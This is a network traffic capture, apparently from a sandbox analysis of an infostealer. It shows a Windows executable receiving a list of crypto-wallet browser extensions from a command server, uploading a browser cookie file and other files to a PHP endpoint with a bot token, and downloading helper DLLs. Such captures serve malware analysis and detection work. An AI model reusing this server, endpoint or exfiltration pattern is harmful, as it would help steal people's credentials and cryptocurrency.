Nov 2, 2024 17:56:21.681848049 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:21 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 2, 2024 17:56:21.681900978 CET	212	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8
Nov 2, 2024 17:56:21.681912899 CET	1236	IN	Data Raw: 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 Data Ascii: ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZ
Nov 2, 2024 17:56:21.681986094 CET	1236	IN	Data Raw: 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d Data Ascii: dHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGp
Nov 2, 2024 17:56:21.681998968 CET	1236	IN	Data Raw: 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 Data Ascii: bmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGh
Nov 2, 2024 17:56:21.682132959 CET	1236	IN	Data Raw: 64 57 78 30 66 47 6c 6e 61 33 42 6a 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 Data Ascii: dWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWp
Nov 2, 2024 17:56:21.682151079 CET	848	IN	Data Raw: 4d 48 78 49 51 56 5a 42 53 43 42 58 59 57 78 73 5a 58 52 38 59 32 35 75 59 32 31 6b 61 47 70 68 59 33 42 72 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 Data Ascii: MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl
Nov 2, 2024 17:56:21.682595968 CET	104	IN	Data Raw: 5a 47 56 6c 61 32 35 69 59 6d 4a 75 61 47 4e 6a 66 44 46 38 4d 48 77 77 66 46 56 75 61 58 4e 33 59 58 41 67 52 58 68 30 5a 57 35 7a 61 57 39 75 66 47 35 75 63 47 31 6d 63 47 78 72 5a 6d 39 6e 5a 6e 42 74 59 32 35 6e 63 47 78 6f 62 6d 4a 6b 62 6d Data Ascii: ZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJkbm5pbG1jZGNnfDF8MHwwfA==
Nov 2, 2024 17:56:21.684354067 CET	468	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG Host: 62.204.41.163 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 2d 2d 0d 0a Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="message"fplugins------IIEHJEHDBGHIDGDGHCBG--
Nov 2, 2024 17:56:21.947931051 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:21 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 2, 2024 17:56:22.362195015 CET	201	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJ Host: 62.204.41.163 Content-Length: 6599 Connection: Keep-Alive Cache-Control: no-cache
Nov 2, 2024 17:56:22.362234116 CET	6599	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 Data Ascii: ------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 2, 2024 17:56:22.651155949 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:56:23.140125990 CET	92	OUT	GET /1d1758bf3d6d1a39/sqlite3.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:56:23.401493073 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 2, 2024 17:56:23.401524067 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49787	62.204.41.163	80	6456	C:\Users\user\Desktop\DbMBWMxoNv.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 17:56:36.745786905 CET	627	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH Host: 62.204.41.163 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KFHJJDHJEGHJKECBGCFH--
Nov 2, 2024 17:56:37.642735958 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:56:37.755701065 CET	563	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJD Host: 62.204.41.163 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file"------GDHIIIIEHCFIECAKFHJD--
Nov 2, 2024 17:56:38.034730911 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49933	62.204.41.163	80	6456	C:\Users\user\Desktop\DbMBWMxoNv.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 17:56:51.925064087 CET	201	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE Host: 62.204.41.163 Content-Length: 4635 Connection: Keep-Alive Cache-Control: no-cache
Nov 2, 2024 17:56:51.925142050 CET	4635	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 2, 2024 17:56:52.802645922 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:52 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:56:52.983939886 CET	563	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ Host: 62.204.41.163 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="file"------KFCGDBAKKKFBGDHJKFHJ--
Nov 2, 2024 17:56:53.262197018 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:53 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:56:53.978347063 CET	92	OUT	GET /1d1758bf3d6d1a39/freebl3.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:56:54.247462988 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:54 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 2, 2024 17:56:54.247483015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 2, 2024 17:56:54.247493029 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
